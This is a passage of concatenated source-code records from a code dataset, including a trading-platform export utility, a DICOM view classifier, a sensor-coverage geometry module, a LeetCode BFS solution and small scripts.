acm.FStateChartEvent(event_name)\n to_state = states.At(to_state_name)\n state.CreateTransition(event, to_state)\n sc.Commit()\n\n if layout:\n sc.Layout().Text(layout)\n sc.Commit()\n logger.info('Successfully created state chart \"{0}\"'.format(sc.Name()))\n return sc\t\n\t\ndef CreateStandardExportStateChart(name):\n exportEventId = StandardExportEventId()\n limit = 'Single'\n layout = 'Awaiting Confirmation,280,-76;Cancel,469,133;Corrected,280,59;Ready,91,-71;Cancel Sent,466,-70;Sent,92,139;'\n definition = {\n 'Ready': {exportEventId: 'Sent'},\n 'Sent': {'Void Trade': 'Cancel',\n 'Correct Trade': 'Awaiting Confirmation'},\n 'Awaiting Confirmation': {'Correction Confirmed': 'Corrected',\n 'Void Trade': 'Cancel'},\n 'Corrected': {exportEventId: 'Sent',\n 'Void Trade': 'Cancel'},\n 'Cancel': {exportEventId: 'Cancel Sent'},\n }\n return CreateStateChart(name, definition, layout, limit)\n\ndef CreateInstrumentExportStateChart_adv(name):\n exportEventId = StandardExportEventId()\n limit = 'Single'\n layout = 'Amended,280,-76;Cancel,469,133;Ready,91,-71;Cancel Sent,466,-70;Sent,92,139;'\n definition = {\n 'Ready': {exportEventId: 
'Sent'},\n 'Sent': {'Void Instrument': 'Cancel',\n 'Inst. Amended': 'Amended'},\n 'Amended': {exportEventId: 'Sent'},\n 'Cancel': {exportEventId: 'Cancel Sent'},\n }\n return CreateStateChart(name, definition, layout, limit)\t\n\t\ndef CreateInstrumentExportStateChart(name):\n exportEventId = StandardExportEventId()\n limit = 'Single'\n layout = 'Awaiting Confirmation,280,-76;Cancel,469,133;Corrected,280,59;Ready,91,-71;Cancel Sent,466,-70;Sent,92,139;'\n definition = {\n 'Ready': {exportEventId: 'Sent'},\n }\n return CreateStateChart(name, definition, layout, limit)\n\ndef TradeFilterQueriesForIntegration(tradeQueryPrefix):\n integrationQueries = list()\n allQueries = acm.FStoredASQLQuery.Select(\"\")\n for storedQuery in allQueries:\n if storedQuery.Name().startswith(tradeQueryPrefix) and storedQuery.User() == None and storedQuery.Query().QueryClass() == acm.FTrade:\n integrationQueries.append(storedQuery)\n return integrationQueries\n\ndef FindMatchingQueryId(subject, ACMQueryIdList):\n \"\"\"\n first query satisfying the subject type is picked\n Need to see if and for which query (often represents product type) the subject fits\n \"\"\"\n if ACMQueryIdList:\n if type(ACMQueryIdList) == type(''):\n ACMQueryId = ACMQueryIdList\n else:\n ACMQueryId = ACMQueryIdList[0]\n #for ACMQueryId in ACMQueryIdList:\n ACMQuery = acm.FStoredASQLQuery[str(ACMQueryId)]\n assert ACMQuery, \"No ACM query with name %s\" % ACMQueryId\n qClass = ACMQuery.Query().QueryClass()\n #assert subject.IsKindOf(qClass), \"Query '%s' is for %s, but the subject is %s\" % (ACMQuery.Name(), qClass.Name(), subject.Class().Name())\n if ACMQuery.Query().IsSatisfiedBy(subject):\n return ACMQueryId\n return None\n\ndef RevertBusinessProcessesInErrorState(stateChartId):\n for bp in acm.BusinessProcess.FindByStateChart(acm.FStateChart[stateChartId]):\n if bp.CurrentStep().State().Name() == 'Error':\n try:\n bp.HandleEvent('Revert', notes=['Retry failed export'])\n bp.Commit()\n except RuntimeError as err:\n pass\n\n\nclass ExportTestMode(object):\n\n MODES = ('Disabled',\n 'Disabled - Do NOT transfer export file(s)',\n 'Enabled - Transfer export file(s)',\n 'Enabled - Do NOT transfer export file(s)')\n DEFAULT_MODE = 'Disabled'\n\n def __init__(self, mode=DEFAULT_MODE):\n if mode not in self.MODES:\n raise ValueError('Invalid export test mode \"' + str(mode) + '\"')\n self._mode = mode\n\n def __str__(self):\n return self.Mode()\n\n def IsEnabled(self):\n return (self.Mode() == 'Enabled - Transfer export file(s)' or self.Mode() == 'Enabled - Do NOT transfer export file(s)')\n\n def IsFileTransferEnabled(self):\n return (self.Mode() == 'Enabled - Transfer export file(s)' or self.Mode() == 'Disabled')\n\n def Mode(self):\n return self._mode\n\n\nclass ExportParty(object):\n broker = 'Broker'\n acquirer = 'Acquirer'\n counterparty = 'Counterparty'\n\n exts = acm.GetDefaultContext().GetAllExtensions('FColumnDefinition', 'trade_Broker')\n if len(exts) != 0:\n if exts[0].Value().GetString('ColumnName') != '':\n broker = exts[0].Value().GetString('ColumnName')\n if exts[0].Value().GetString('LabelList') != '':\n broker = exts[0].Value().GetString('LabelList').split(';')[0]\n exts = acm.GetDefaultContext().GetAllExtensions('FColumnDefinition', 'trade_acquirer_ptynbr')\n if len(exts) != 0:\n if exts[0].Value().GetString('ColumnName') != '':\n acquirer = exts[0].Value().GetString('ColumnName')\n if exts[0].Value().GetString('LabelList') != '':\n acquirer = exts[0].Value().GetString('LabelList').split(';')[0]\n exts = 
acm.GetDefaultContext().GetAllExtensions('FColumnDefinition', 'trade_counterparty_ptynbr')\n if len(exts) != 0:\n if exts[0].Value().GetString('ColumnName') != '':\n counterparty = exts[0].Value().GetString('ColumnName')\n if exts[0].Value().GetString('LabelList') != '':\n counterparty = exts[0].Value().GetString('LabelList').split(';')[0]\n\n MODES = (broker,\n acquirer,\n counterparty)\n DEFAULT_MODE = broker\n\n def __init__(self, mode=DEFAULT_MODE):\n if mode not in self.MODES:\n raise ValueError('Invalid party \"' + str(mode) + '\"')\n self._mode = mode\n\n def __str__(self):\n return self.Mode()\n\n def Mode(self):\n return self._mode\n\n def GetPartyObj(self, trade):\n if self._mode in self.MODES:\n if self._mode == self.MODES[0]:\n return trade.Broker()\n elif self._mode == self.MODES[1]:\n return trade.Acquirer()\n elif self._mode == self.MODES[2]:\n return trade.Counterparty()\n \n \n \ndef ExportBusinessProcess(trade, stateChart):\n collection = acm.BusinessProcess().FindBySubjectAndStateChart(trade, stateChart)\n if collection:\n return collection[0]\n\ndef ExportBusinessProcessStates(businessProcess):\n if businessProcess:\n currentStep = businessProcess.CurrentStep()\n currentStepName = str(currentStep.State().Name())\n previousStep = currentStep.PreviousStep()\n previousStepName = 'None'\n if previousStep:\n previousStepName = str(previousStep.State().Name())\n return (previousStepName, currentStepName)\n return ('None', 'None')\n\n\ndef import_custom_integration_module(prepack_name):\n if not prepack_name:\n return None\n\n import importlib\n module_suffix = 'CustomIntegration'\n try:\n prepack_module = acm.GetDefaultContext().GetModule(prepack_name)\n python_files = prepack_module.GetAllExtensions('FPythonCode')\n custom_integration_files = [python_file for python_file in python_files\n if module_suffix in python_file.Name().Text()]\n if custom_integration_files:\n if len(custom_integration_files) > 1:\n logger.error(\"More than one Custom Integration Python module found.\")\n return None\n\n return importlib.import_module(custom_integration_files[0].Name().Text())\n\n else:\n logger.error(\"Couldn't find Custom Integration Python module\")\n return None\n\n except Exception as e:\n logger.error('Error while importing Custom Integration Python module. 
' + str(e.message))\n return None\n\n\ndef create_add_info_spec(type, add_info_list):\n DATA_TYPE_ENUM = list(acm.FEnumeration['enum(B92StandardType)'].Values())\n for i in add_info_list:\n add_info_spec = acm.FAdditionalInfoSpec[i]\n if not add_info_spec:\n add_info_spec = acm.FAdditionalInfoSpec()\n add_info_spec.RecType(type)\n add_info_spec.DataTypeType(DATA_TYPE_ENUM.index('String'))\n add_info_spec.Name(i)\n add_info_spec.Description(i)\n add_info_spec.Commit()\n\n\ndef create_add_info(type, i):\n DATA_TYPE_ENUM = list(acm.FEnumeration['enum(B92StandardType)'].Values())\n add_info_spec = acm.FAdditionalInfoSpec[i]\n if not add_info_spec:\n add_info_spec = acm.FAdditionalInfoSpec()\n add_info_spec.RecType(type)\n add_info_spec.DataTypeType(DATA_TYPE_ENUM.index('String'))\n add_info_spec.Name(i)\n add_info_spec.Description(i)\n add_info_spec.Commit()\n logger.info('Additional Info Specification {} for record type {} created successfully.'.format(i, type))\n else:\n logger.warn('Additional Info Specification {} for record type {} already exists.'.format(i, type))\n\n\ndef check_parameter(param):\n aliases_types = [alias.Name() for alias in acm.FInstrAliasType.Select('')]\n addinfos_types = [addinfo.Name() for addinfo in acm.FAdditionalInfoSpec.Select(\"recType='Instrument'\")]\n if param.Text() in aliases_types:\n return 'Alias'\n elif param.Text() in addinfos_types:\n return 'AdditionalInfo'\n elif isAttribute(acm.FInstrument, param):\n return 'Attribute'\n else:\n return None\n\n\ndef isAttribute(acmObj, attributes):\n if \":\" not in attributes:#not alias and not addinfo\n attr = attributes.Text().split(\".\", 1)\n if len(attr) == 2:\n try:\n return isAttribute(acmObj.GetMethod(attr[0], 0).ValueDomain(), attr[1])\n except Exception as e:\n return False\n else:\n return acmObj.GetMethod(attr[0], 0) is not None \n\n\ndef get_parameters(parameters_file):\n settings = acm.FDictionary()\n parameters = acm.GetDefaultContext().GetExtension('FParameters', 'FObject', parameters_file)\n if parameters:\n settings.AddAll(parameters.Value())\n return settings\n\n\ndef InitialiseParameters():\n parameters = get_parameters(\"InstIdentifiers\")\n \n paramTypes = acm.FDictionary()\n\n for p in parameters:\n parType = check_parameter(parameters[p])\n if parType:\n paramTypes[p] = acm.FDictionary()\n paramTypes[p][parameters[p]] = parType\n \n return paramTypes\n \ndef FindInsIdentifiers(ins, paramTypes):\n dict = acm.FOrderedDictionary()\n for iden in paramTypes:\n for value in paramTypes[iden]:\n idenValue = FindID(ins, value.Text(), paramTypes[iden][value])\n if idenValue:\n dict[iden]= idenValue\n return dict\n\ndef FindID(inst, IdName, IdType):\n if IdType == 'Alias':\n ident = inst.Alias(IdName)\n elif IdType == 'AdditionalInfo':\n ident = inst.add_info(IdName) \n elif IdType == 'Attribute':\n ident = getattr(inst, IdName)()\n else:\n ident = None\n return ident","sub_path":"Extensions/BD Export/FPythonCode/FExportUtils.py","file_name":"FExportUtils.py","file_ext":"py","file_size_in_byte":13567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"286671489","text":"# This file is an enhanced version of main.py that uses OOPS\r\n\r\n# Constant values\r\nDEVICE_OPTIONS = {'1': 'LAPTOP', '2': 'ANDROID', '3': 'IOS'}\r\nJOB_OPTIONS = {'1': 'Student', '2': 'Software Developer', '3': 'Business Person', '4': 'Data Scientist','5': 'Common person (Beginner knowledge of Tech)'}\r\nSCHOOL_OPTIONS = {\r\n '1': 'Primary', '2': 'Junior School', '3': 'Middle 
School', '4': 'Junior High School', '5': 'Senior High School'}\r\nSDE_OPTIONS = {'1': 'SDE 1', '2' : 'SDE 2', '3': 'SDE 3'}\r\nBUSINESS_OPTIONS = {'1': 'Manufacturing', '2': 'Service', '3': 'Merchandising', '4': 'Hybrid'}\r\nDEVICES = 3\r\nJOBS = 5\r\nSCHOOLS = 5\r\nSOFTWARE_DEVELOPERS = 3\r\n\r\n# Main Device Selection class\r\nclass DeviceSelector:\r\n def __init__(self, deviceType, profession):\r\n self.deviceType = deviceType\r\n self.profession = profession\r\n \r\n def success_msg(self):\r\n print(\"{} has been selected.\".format(self.deviceType))\r\n print(\"User is a {}\".format(self.profession))\r\n return self.profession\r\n\r\nclass Input():\r\n def __init__(self):\r\n #self.seq = 0\r\n self.deviceInput = int(input(\"What type of device do you want? \\n Choose one from the following: \\n 1. LAPTOP \\n 2. ANDROID \\\r\n \\n 3. IOS \\n Type numbers for selecting the option.\\n\"))\r\n self.deviceInput = self.input_device(self.deviceInput, DEVICES)\r\n self.device = DEVICE_OPTIONS.get(str(self.deviceInput))\r\n self.professionInput = int(input(\"What is your profession? \\n Choose one from the following: \\n 1. Student \\n 2. Software Developer \\n 3. Business Person \\\r\n \\n 4. Data Scientist \\n 5. Common person (Beginner knowledge of Tech) \\nType number of option.\\n\"))\r\n self.professionInput = self.input_profession(self.professionInput, JOBS)\r\n self.profession = JOB_OPTIONS.get(str(self.professionInput))\r\n self.professionSubType = self.input_professionType(self.profession)\r\n\r\n def input_device (self, deviceInput, DEVICES):\r\n #self.seq = 1\r\n if deviceInput > DEVICES or deviceInput <= 0:\r\n print(\"Choice not found. You would have to retry.\")\r\n deviceInput = int(input(\"What type of device do you want? \\n Choose one from the following: \\n 1. LAPTOP \\n 2. ANDROID \\\r\n \\n 3. IOS \\n Type numbers for selecting the option.\\n\"))\r\n deviceInput = self.input_device(deviceInput, DEVICES)\r\n return deviceInput\r\n\r\n def input_profession (self, professionInput, JOBS):\r\n #self.seq = 2\r\n if professionInput > JOBS or professionInput <= 0:\r\n print(\"Choice not found. You would have to retry.\")\r\n professionInput = int(input(\"What is your profession? \\n Choose one from the following: \\n 1. Student \\n 2. Software Developer \\n 3. Business Person \\\r\n \\n 4. Data Scientist \\n 5. Common person (Beginner knowledge of Tech) \\nType number of option.\\n\"))\r\n professionInput = self.input_profession(professionInput, JOBS)\r\n return professionInput\r\n\r\n def input_professionType (self, profession):\r\n #self.seq = 3\r\n if profession == 'Student':\r\n #studentType = \"\"\r\n professionSubType = int(input(\"What kind of school? \\n Choose one from the following: \\n 1. Primary/Pre-Primary (Pre-Nursery, Nursery, Kindergarten, Grade 1 & Grade 2) \\\r\n \\n 2. Junior School (Grade 3 to Grade 5)\\n 3. Middle School (Grade 6 to Grade 8) \\\r\n \\n 4. Junior High School (Grade 9 to Grade 10) \\n 5. Senior High School (Grade 11 to Grade 12) \\\r\n \\n Choose a number from the given options.\\n\"))\r\n if professionSubType > SCHOOLS or professionSubType <= 0:\r\n print(\"Choice not found. 
You would have to retry.\")\r\n                professionSubType = self.input_professionType(self.profession)\r\n                studentType = professionSubType\r\n                return studentType\r\n            else:\r\n                studentType = SCHOOL_OPTIONS.get(str(professionSubType))\r\n                return studentType\r\n        \r\n        if profession == 'Software Developer':\r\n            professionSubType = int(input(\"Please mention the tier of your Software Development. \\n Choose one from the following: \\n 1. Tier 1\\\r\n                \\n 2. Tier 2 \\n 3. Tier 3 \\n Write number to select option.\"))\r\n            if professionSubType > SOFTWARE_DEVELOPERS or professionSubType <= 0:\r\n                print(\"Choice not found. You would have to retry.\")\r\n                professionSubType = self.input_professionType(self.profession)\r\n                SDEType = professionSubType\r\n                return SDEType\r\n            else:\r\n                SDEType = SDE_OPTIONS.get(str(professionSubType))\r\n                return SDEType\r\n    \r\n    def output (self):\r\n        return(str(\"{} has been queried & the user is a {}\".format(self.device, self.profession)))\r\n\r\nobj = Input()\r\njob = obj.profession\r\ndeviceinp = obj.device\r\njobType = obj.professionSubType\r\nprint(job)\r\nprint(jobType)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"284693928","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 5 07:57:57 2018\n\n@author: Adrian\n\"\"\"\n\nimport os\nimport pydicom\nimport numpy as np\nimport gzip\nfrom skimage.transform import resize\nimport imageio\n\n\nfrom keras.models import Model, model_from_json, Sequential\nfrom keras.layers import TimeDistributed, Dense, SimpleRNN, Input, Flatten, Convolution2D, InputLayer, Reshape, Conv2D, MaxPooling2D, Dropout, BatchNormalization\nfrom keras.optimizers import Adam\n\ngoalpath=os.path.join(os.getcwd(), 'main_dir')\nmodel_path='View_Custom'\n\nif not os.path.isdir('train_data_RWMA'):\n    os.makedirs('train_data_RWMA')\nsave_path=os.path.join(os.getcwd(), 'train_data_RWMA')\n\nANdirlist=os.listdir(goalpath)\n\n\ndef labeling(x='all', ANdirlist=ANdirlist):\n    if x=='all': ANdirlist=ANdirlist[:]\n    else: ANdirlist=ANdirlist[:int(x)]\n    \n    all_labels=[]\n    for i, an in enumerate(ANdirlist):\n        print('{}/{}'.format(i, len(ANdirlist)))\n        savedirpath=os.path.join(save_path, an)\n        if not os.path.isdir(savedirpath):\n            os.makedirs(savedirpath)\n            #print('made dir')\n        savedirlist=os.listdir(savedirpath)\n        if len(savedirlist)<4:\n            labels=ANdir_labeling(an)\n\n            all_labels.append(labels) \n    \n    return all_labels\n\ndef ANdir_labeling(an):\n\n    an_path=os.path.join(goalpath, an)\n    files=os.listdir(an_path)\n    \n    for i, dcm in enumerate(files):\n        print('{} is being processed'.format(i))\n        file_path=os.path.join(an_path, dcm)\n        try: \n            tar_array=preparefile(file_path)\n            #print(tar_array.shape)\n            print('Predicting', end='')\n            label=model.predict(tar_array)\n            print('.....Prediction done')\n\n        except NotImplementedError: \n            label=np.array([[0,0,0,0,0]])\n        \n        if i==0: labels=label\n        else : labels=np.concatenate((labels, label))\n\n    name_list=['LAX', 'SAX', '4ch', '2ch']\n    for seq, i in enumerate(labels.argmax(axis=0)[:4]):\n        file_path=os.path.join(an_path, files[i])\n        tar_array=preparefile(file_path, a=768, b=1024)\n        save_file_path=os.path.join(save_path, an, name_list[seq]+'.npy.gz')\n        img_file_path=os.path.join(save_path, an, name_list[seq]+'.jpg')\n        with gzip.GzipFile(save_file_path, \"w\") as gf:\n            np.save(gf, tar_array)\n        imageio.imwrite(img_file_path, tar_array[0][5])\n\n    return labels\n\ndef get_array(path):\n    
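\"\"\"Read a DICOM file with pydicom and return its pixel array.\"\"\"\n    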
ds=pydicom.read_file(path)\n dt=ds.pixel_array\n return dt\n\ndef regrid_vid(tar_array, a=600, b=800):\n for i, img in enumerate(tar_array):\n img=regrid(img, a=a, b=b)\n if i==0: tar_array_sub=img\n else : tar_array_sub=np.concatenate((tar_array_sub, img))\n return tar_array_sub\n\ndef regrid(img, a=600, b=800):\n img_resized=resize(img, (a,b))\n img_resized=np.expand_dims(img_resized, axis=0)\n return img_resized\n\ndef pad2fifty(tar_dcm):\n add_len=50-len(tar_dcm)\n add_array=np.zeros(shape=(add_len, tar_dcm.shape[1], tar_dcm.shape[2], tar_dcm.shape[3]))\n tar_dcm=np.concatenate((tar_dcm, add_array))\n return tar_dcm\n\ndef preparefile(file_path, a=600, b=800):\n tar_array=get_array(file_path)/255\n #print(tar_array.shape)\n if len(tar_array.shape) < 4: raise NotImplementedError\n if tar_array.shape[1:4] != (a, b, 3):\n tar_array=regrid_vid(tar_array, a, b)\n if len(tar_array)<50:\n tar_array=pad2fifty(tar_array) \n tar_array=tar_array[:50]\n tar_array=np.expand_dims(tar_array, axis=0)\n return tar_array\n\ndef model_loading(x):\n with open(str(x)+'_arch.json', 'r') as json_file:\n model_json=json_file.read()\n model=model_from_json(model_json)\n model.load_weights(str(x)+'_weights.h5')\n optimizer=Adam(lr=1e-4)\n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n print('model loaded')\n return model\n\n\nif __name__=='__main__':\n x=input('How many folders you wanna predict?\\n')\n model=model_loading(model_path)\n \n try:\n x=int(x)\n all_labels=labeling(x=x, ANdirlist=ANdirlist)\n except:\n all_labels=labeling()","sub_path":"predictViews_customV1.py","file_name":"predictViews_customV1.py","file_ext":"py","file_size_in_byte":4131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"502605190","text":"'''\n 994. 
Rotting Oranges (Difficulty: Easy)\nIn a given grid, each cell can hold one of three values:\n\tthe value 0 represents an empty cell;\n\tthe value 1 represents a fresh orange;\n\tthe value 2 represents a rotten orange.\nEvery minute, any fresh orange that is adjacent (in the 4 cardinal directions) to a rotten orange becomes rotten.\nReturn the minimum number of minutes that must elapse until no cell holds a fresh orange. If this is impossible, return -1.\n'''\n\n\nclass Solution(object):\n    def orangesRotting_1(self, grid):\n        \"\"\"\n        :type grid: List[List[int]]\n        :rtype: int\n        \"\"\"\n        import collections\n        R, C = len(grid), len(grid[0])\n\n        # queue - all starting cells with rotting oranges\n        queue = collections.deque()\n        for r, row in enumerate(grid):\n            for c, val in enumerate(row):\n                if val == 2:\n                    queue.append((r, c, 0))\n\n        def neighbors(r, c):\n            for nr, nc in ((r - 1, c), (r, c - 1), (r + 1, c), (r, c + 1)):\n                if 0 <= nr < R and 0 <= nc < C:\n                    yield nr, nc\n\n        d = 0\n        while queue:\n            r, c, d = queue.popleft()\n            for nr, nc in neighbors(r, c):\n                if grid[nr][nc] == 1:\n                    grid[nr][nc] = 2\n                    queue.append((nr, nc, d + 1))\n\n        if any(1 in row for row in grid):\n            return -1\n        return d\n\n    # BFS implemented with sets\n    # Runtime: 44 ms, beats 55.56% of Python submissions\n    # Memory: 11.9 MB, beats 8.00% of Python submissions\n    def orangesRotting_2(self, grid):\n        row = len(grid)\n        col = len(grid[0])\n        rotten = {(i, j) for i in range(row) for j in range(col) if grid[i][j] == 2} # set of rotten oranges\n        fresh = {(i, j) for i in range(row) for j in range(col) if grid[i][j] == 1} # set of fresh oranges\n        time = 0\n        print(rotten, fresh, sep=\" \")\n        while fresh:\n            if not rotten:\n                return -1\n            # Any neighbour of a rotten orange that is still in the fresh set rots now\n            #####################################################\n            '''drotten = set()\n            for i, j in rotten:\n                for di, dj in [(0, 1), (0, -1), (1, 0), (-1, 0)]:\n                    if (i + di, j + dj) in fresh:\n                        drotten.add((i + di, j + dj))\n            rotten = drotten'''\n            #####################################################\n            # equivalent to:\n            rotten = {(i + di, j + dj) for i, j in rotten for di, dj in [(0, 1), (0, -1), (1, 0), (-1, 0)] if\n                      (i + di, j + dj) in fresh}\n            fresh -= rotten # remove the newly rotten ones\n            time += 1\n        return time\n\n    # BFS implemented with a queue\n    # Runtime: 36 ms, beats 88.14% of Python submissions\n    # Memory: 11.7 MB, beats 72.00% of Python submissions\n    def orangesRotting_3(self, grid):\n        row, col, time = len(grid), len(grid[0]), 0\n        directions = [(1, 0), (-1, 0), (0, 1), (0, -1)]\n        queue = []\n        # add the rotten orange to the queue\n        # for i in range(row):\n        #     for j in range(col):\n        #         if grid[i][j] == 2:\n        #             queue.append((i, j, time))\n        queue = [(i, j, time) for i in range(row) for j in range(col) if grid[i][j] == 2]\n\n        # bfs\n        while queue:\n            i, j, time = queue.pop(0) # pop a rotten orange\n            for di, dj in directions:\n                # find the fresh oranges that this rotten orange can rot\n                if 0 <= i + di < row and 0 <= j + dj < col and grid[i + di][j + dj] == 1:\n                    grid[i + di][j + dj] = 2 # mark it rotten\n                    queue.append((i + di, j + dj, time + 1)) # enqueue the newly rotten orange\n\n        # if there are still fresh oranges, return -1\n        for row in grid:\n            if 1 in row:\n                return -1\n        return time\n\n\ns = Solution()\nprint(s.orangesRotting_3([[2, 1, 1], [1, 1, 0], [0, 1, 1]]))\n","sub_path":"leetcode/LC0017_994_orangesRotting.py","file_name":"LC0017_994_orangesRotting.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"534471493","text":"import math\r\nimport graphics as gr\r\nfrom jdgeometry import Point, Circle, Line, Polygon\r\nimport random\r\nimport time\r\n\r\n#--[Class AreaOfInterest]------------------------------------------------------\r\n# Represents the Rectangular Area of Interest\r\nclass AreaOfInterest:\r\n    \r\n    ## Lines forming the border of the rectangular region\r\n    ## l1 is the left boundary and the rest follow in clockwise direction\r\n    l1 = None\r\n    l2 = None\r\n    l3 = None\r\n    l4 = None\r\n    rect = 
    rect = None\r\n    diag = None\r\n    \r\n    def __init__(self,l1,l2,l3,l4):\r\n        self.l1 = l1\r\n        self.l2 = l2\r\n        self.l3 = l3\r\n        self.l4 = l4\r\n        self.rect = Polygon(l1.p1, l2.p1, l3.p1, l4.p1)\r\n        self.diag = l1.p1.distance(l2.p2)\r\n        \r\n    @classmethod\r\n    def byDiagonal(cls,p1,p2):\r\n        l1 = Line(p1, Point(p1.x, p2.y))\r\n        l2 = Line(Point(p1.x,p2.y), p2)\r\n        l3 = Line(p2, Point(p2.x, p1.y))\r\n        l4 = Line(Point(p2.x,p1.y), p1)\r\n        \r\n        return cls(l1,l2,l3,l4)\r\n    \r\n    \r\n    @classmethod\r\n    def byLine(cls,l1, l2, l3, l4):\r\n        return cls(l1,l2,l3,l4)\r\n    \r\n    \r\n#--[Class Sensor ]-------------------------------------------------------------\r\n## Represents a Sensor type\r\nclass Sensor:\r\n    type = None\r\n    range = None\r\n    cost = None\r\n    loc = None # Set of feasible locations\r\n    curloc = None # index of the present location from the global list of locations\r\n\r\n    \r\n    def __init__(self, typ, rg, cost,locs,curloc):\r\n        self.s_type = typ\r\n        self.s_range = rg\r\n        self.s_cost = cost\r\n        self.s_loc = locs\r\n        self.curloc = curloc\r\n        \r\n\r\n#--[Class Sensor Location ]-------------------------------------------------------------\r\n## Represents a feasible location from the set of all feasible locations\r\n# This will be used to represent properties associated with the sensor location\r\n# like:-\r\n# (a) The sensor to which it belongs\r\n# (b) List of sensors whose sensing range overlaps the perimeter of the sensor\r\n#     located at this location\r\n#\r\n# This class will be helpful to find perimeter overlaps by other sensors\r\nclass SensorLocation:\r\n    \r\n    def __init__ (self, point, sensor):\r\n        \r\n        self.point = point # The coordinate of the location\r\n        self.sensor = sensor # The sensor to which it belongs\r\n        \r\n        # List of sensors whose sensing range overlaps the perimeter of the \r\n        # sensor located at this location\r\n        # Tuple: (thisSensorCenter, \r\n        #        overlapping_sensor_object, \r\n        #        startAngleOfOverlap, \r\n        #        endAngleOfOverlap, \r\n        #        extent, \r\n        #        distanceBetweenSensors )\r\n        self.overlappingSensors = [] \r\n        \r\n    ## Adds a sensor to the list of overlapping sensors\r\n    # @param sensorCenter: The center Point of the overlapping sensor\r\n    # @param sensor: The object of the sensor class which is being added (i.e. the one which is overlapping)\r\n    # @param startAngle: The angle in radians (measured anti-clockwise) at which the overlap starts with the perimeter of the sensor located at this location\r\n    # @param endAngle: The angle in radians (anti-clockwise) at which the overlap ends\r\n    # @param extent: The extent of the overlap in radians\r\n    # @param distance: The Euclidean distance between the centres of the overlapping sensor and this location\r\n    def addOverlappingSensor(self,sensorCenter, sensor,startAngle, endAngle, extent, distance):\r\n\r\n        \r\n        # Arcs that wrap past 0 or 2*pi are split into two entries; 'normal' stays\r\n        # False once a split has been recorded, so the arc is not added twice.\r\n        normal = True\r\n        if startAngle < 0:\r\n            e1 = 2*math.pi + startAngle\r\n            self.overlappingSensors.append((sensorCenter, sensor, e1, 2*math.pi, e1, distance) )\r\n            self.overlappingSensors.append((sensorCenter, sensor, 0, endAngle, extent - e1, distance) )\r\n            normal = False\r\n        \r\n        if endAngle > 2 * math.pi:\r\n            e1 = 2*math.pi - startAngle\r\n            self.overlappingSensors.append((sensorCenter, sensor, startAngle, 2*math.pi, e1, distance) )\r\n            self.overlappingSensors.append((sensorCenter, sensor, 0, (endAngle - 2*math.pi), extent - e1, distance) )\r\n            normal = False\r\n        \r\n        if normal == True:\r\n            self.overlappingSensors.append((sensorCenter, sensor, startAngle, endAngle, extent, distance) 
)\r\n\r\n# Class to represent the circles which cover a portion of the perimeter of a sensor\r\nclass CoveringCircle:\r\n    def __init__(self, center, radius, s_ang, ext_ang, dist):\r\n        self.center = center\r\n        self.radius = radius\r\n        self.s_angle = s_ang\r\n        self.extent = ext_ang\r\n        self.dist = dist","sub_path":"MTP/Sensors/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"336493117","text":"import os\nfrom setuptools import setup\n\ncielo = __import__('cielo', {}, {}, [''])\n\ndef read_file(fname):\n    return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n    name = \"pycielo\",\n    version = cielo.__version__,\n    author = \"Dado\",\n    author_email = \"vinicius.cainelli@dado.ppg.br\",\n    description = (\"cielo python client\"),\n    license = \"MIT\",\n    keywords = \"cielo\",\n    url = \"https://github.com/viniciuscainelli/pycielo\",\n    packages=['cielo',],\n    long_description=read_file('README.textile'),\n    classifiers=[\n        \"Programming Language :: Python\",\n        \"Topic :: Software Development :: Libraries :: Python Modules\",\n    ],\n    install_requires=['requests >= 0.10',],\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"572076265","text":"# @Time : 2019/6/29 8:08\n# @Author : Xu Huipeng\n# @Blog : https://brycexxx.github.io/\n\nfrom typing import List\n\n\nclass Solution:\n    def findMin(self, nums: List[int]) -> int:\n        low, high = 0, len(nums) - 1\n        while low < high:\n            mid = low + ((high - low) >> 1)\n            while low < high and nums[low] == nums[mid] == nums[high]:\n                low += 1\n                high -= 1\n            if nums[mid] > nums[high]:\n                low = mid + 1\n            else:\n                high = mid\n        return nums[low]\n\n\nif __name__ == '__main__':\n    s = Solution()\n    print(s.findMin([2, 2, 2, 0, 1]))\n","sub_path":"findMinTwo.py","file_name":"findMinTwo.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"86870643","text":"#!/usr/bin/env python\nimport numpy as np\nimport cv2\n\n# Load a color image in grayscale\ncv2.namedWindow('image', cv2.WINDOW_NORMAL)\nimg = cv2.imread('messi.jpg',0)\n#size(img) \ncv2.imshow('image',img)\ncv2.imwrite('messigray.png',img)\ncv2.waitKey(0)\ncv2.destroyWindow('image')\n\n","sub_path":"opencv/examples/getting_started/images/tutorial1.py","file_name":"tutorial1.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"387074997","text":"'''\nmat - csv converter for NASA Ames Prognostics Center of Excellence (PCoE),\nLi-ion Battery Aging Datasets.\nDataset available on 'https://c3.nasa.gov/dashlink/resources/133/'\nRef: https://github.com/fmardero/battery_aging\nAuthor: Hyunho Mo\nDate: 19/11/2020\n\n'''\n\nimport pandas as pd\nimport argparse\nfrom scipy.io import loadmat\n\n\nmat_data_folder = 'pcoe/'\nbattery_idx = 'B0018'\nmat_data = loadmat(mat_data_folder + 'B0018.mat')[battery_idx]\n# mat_data = loadmat(mat_data_folder + 'B0005.mat')['B0005']\n# print (type(mat_data))\n# print(mat_data.keys())\n\n\ndef to_df(mat_db):\n    